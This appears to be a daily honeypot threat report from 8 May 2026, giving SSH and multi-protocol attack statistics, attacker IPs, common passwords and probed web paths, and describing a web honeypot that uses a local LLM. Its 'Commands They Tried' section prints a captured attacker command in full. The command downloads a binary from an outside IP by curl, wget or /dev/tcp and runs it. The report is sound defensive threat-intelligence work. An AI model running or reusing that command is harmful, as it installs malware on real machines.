Friday, 8 May 2026 ๐Ÿ’€ critical

Daily Threat Report

637 SSH Connections
730 Login Attempts
99 Commands Run
90 SSH Unique IPs
3,331 Protocol Events
12 Protocol IPs
125 Web Honeypot Hits
40 Web Honeypot IPs

Top Attacker IPs

  1. ๐ŸŒ 87.251.64.176 BGPโ†—
  2. ๐ŸŒ 27.79.5.68 BGPโ†—
  3. ๐ŸŒ 27.79.4.204 BGPโ†—
  4. ๐ŸŒ 192.95.10.220 BGPโ†—
  5. ๐ŸŒ 192.95.10.214 BGPโ†—

Top Passwords Tried

  1. admin
  2. <empty>
  3. 123456
  4. 1234
  5. ubuntu

๐ŸŒ WEB HONEYPOT โ€” Galah LLM

AI-generated fake HTTP responses served to 125 scanner requests from 40 unique IPs. Model: qwen2.5:0.5b (local, offline).

Top Paths Probed

  1. /SDK/webLanguage
  2. /login
  3. /
  4. /og-default.png
  5. *

Top User-Agents

  1. Mozilla/5.0 (Windows NT 10.0
  2. Win64
  3. x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
  4. Go-http-client/1.1
  5. Mozilla/5.0 (compatible
  6. CensysInspect/1.1
  7. +https://about.censys.io/)
  8. Hello World/1.0
# Automatic multi-platform threat intel reporting
$ honeypot-report.sh --since 24h
โ†’ 11 IPs โ†’ AbuseIPDB  (community confidence scores updated)
โ†’ 11 IPs โ†’ AlienVault OTX  (pulse indicators added)
โ†’ 11 IPs โ†’ Blocklist.de  (auto-ban list updated)
โ†’ 11 IPs โ†’ DShield/SANS  (global threat feed updated)

๐Ÿคฃ ATTACKER COMEDY CORNER

Real attempts. No actors were harmed in the making of this honeypot.

๐Ÿ”‘ Hall of Shame โ€” Passwords

admin
<empty>
ubuntu
solana
password

๐Ÿ’ป Commands They Tried

nohup $SHELL -c curl http://47.83.203.183:60138/linux -o /tmp/S65kW5FM3P; if [ ! -f /tmp/S65kW5FM3P ]; then wget http://47.83.203.183:60138/linux -O /tmp/S65kW5FM3P; fi; if [ ! -f /tmp/S65kW5FM3P ]; then exec 6<>/dev/tcp/47.83.203.183/60138 && echo -n GET /linux >&6 && cat 0<&6 > /tmp/S65kW5FM3P ; chmod +x /tmp/S65kW5FM3P && /tmp/S65kW5FM3P Ju4Xfq5S585yXw1SJSxPBFlw0edSoH0U4F9T4BF5rlru1nBeDkg0J0UQXnDV+lu5ew3/VFD0FXmxW+bAc1YQTSQiUg9Wcs7mWLdzFf5WVvcDerlE5dB2QQ9EJzpOClx61uRbsn8D/V5J/xN/rlvm1G5WDUYiJE0OWmDU40S5fA38U1XgEnq5UOLQcV8JXCctUg9fds7lXLlnEvxRXfgTeLJe9NFwXhBOJCRSD1tu0eJZun8T/1NV7htnsV/mznFZD1InIkYIX3HS5kqzcA3/V1HgEni5ROXQcVUITCUkTR5cec7lWrVnEf9fSfoac7Za5dNwTw1FOiVMC0F31vpbsnMV/lZX+QN6uUTl0HZBD0UnOk8JVXbQ5Vm4aRf5SV/9DXuwWfrReFwESiQlTwZPc9n6W7B+Df9VU+AVerpc5NFxXB5IIzpFC0Fy1O1EsXsZ+FdW/hBptF362XVBD04mOk4PVnrW5Fu0fAP7Vkn3Eme3XPrReFcESiQlSA5Pc9n6W7B/Df9fV+ASe7pc5NFyWR5PLTpNDllu0udbrngS+F1R/hJ7uErn2W5eDko6JUUPQXHZ51C2eRL6Xkf6FGe5X/rRclsQTiYiRghfcdPiSrNwDf9XUOASeLVE4dR6WQ5NICxcDVZu0eRfrnsR/klW/BBztlrl03FPDUU6JUwIQXPW+lizfRn4V1b6EWmzU/rRcFkQTS0kUg1YetbkW7F/A/pQSfcQZ7JY7M5xXAxGIiRNDFlg0+1EsXkV4FZf+A1/slDi0HFeDFwgI1IHWm7S4F2ueBP9XVH+Enmwiv49A8FE8PKrOF/zoLSPYVfrEiQuQUoeMO2HnQ==; fi; echo password > /tmp/.opass; chmod +x /tmp/S65kW5FM3P && /tmp/S65kW5FM3P Ju4Xfq5S585yXw1SJSxPBFlw0edSoH0U4F9T4BF5rlru1nBeDkg0J0UQXnDV+lu5ew3/VFD0FXmxW+bAc1YQTSQiUg9Wcs7mWLdzFf5WVvcDerlE5dB2QQ9EJzpOClx61uRbsn8D/V5J/xN/rlvm1G5WDUYiJE0OWmDU40S5fA38U1XgEnq5UOLQcV8JXCctUg9fds7lXLlnEvxRXfgTeLJe9NFwXhBOJCRSD1tu0eJZun8T/1NV7htnsV/mznFZD1InIkYIX3HS5kqzcA3/V1HgEni5ROXQcVUITCUkTR5cec7lWrVnEf9fSfoac7Za5dNwTw1FOiVMC0F31vpbsnMV/lZX+QN6uUTl0HZBD0UnOk8JVXbQ5Vm4aRf5SV/9DXuwWfrReFwESiQlTwZPc9n6W7B+Df9VU+AVerpc5NFxXB5IIzpFC0Fy1O1EsXsZ+FdW/hBptF362XVBD04mOk4PVnrW5Fu0fAP7Vkn3Eme3XPrReFcESiQlSA5Pc9n6W7B/Df9fV+ASe7pc5NFyWR5PLTpNDllu0udbrngS+F1R/hJ7uErn2W5eDko6JUUPQXHZ51C2eRL6Xkf6FGe5X/rRclsQTiYiRghfcdPiSrNwDf9XUOASeLVE4dR6WQ5NICxcDVZu0eRfrnsR/klW/BBztlrl03FPDUU6JUwIQXPW+lizfRn4V1b6EWmzU/rRcFkQTS0kUg1YetbkW7F/A/pQSfcQZ7JY7M5xXAxGIiRNDFlg0+1EsXkV4FZf+A1/slDi0HFeDFwgI1IHWm7S4F2ueBP9XVH+Enmwiv49A8FE8PKrOF/zoLSPYVfrEiQuQUoeMO2HnQ== &
uname -s -m

These are real credentials and commands attempted by automated scanners and script kiddies. Logged, reported, and immortalized.

Automated report for 8 de May de 2026. Recorded 637 SSH connections on the Cowrie honeypot and 3331 multi-protocol events on OpenCanary, from 102 unique IPs. 11 IPs were automatically reported to the AbuseIPDB community database.

SSH Activity (Cowrie)

The SSH honeypot received 730 login attempts from 90 unique IPs. Attackers executed 99 commands after gaining simulated system access.

Multi-Protocol Activity (OpenCanary)

Detected 3331 events across services including FTP, Telnet, MySQL, Redis, VNC and Git from 12 distinct IPs. All events are access attempts against simulated production services.

HTTP Web Honeypot (Galah LLM)

The web honeypot received 125 HTTP requests from real scanners across 40 unique IPs. Each attacker received a fake response generated in real time by the local AI model qwen2.5:0.5b (Ollama, no internet connection required).

โ† All Reports ๐Ÿ›ก๏ธ Subscribe to blocklists โ†’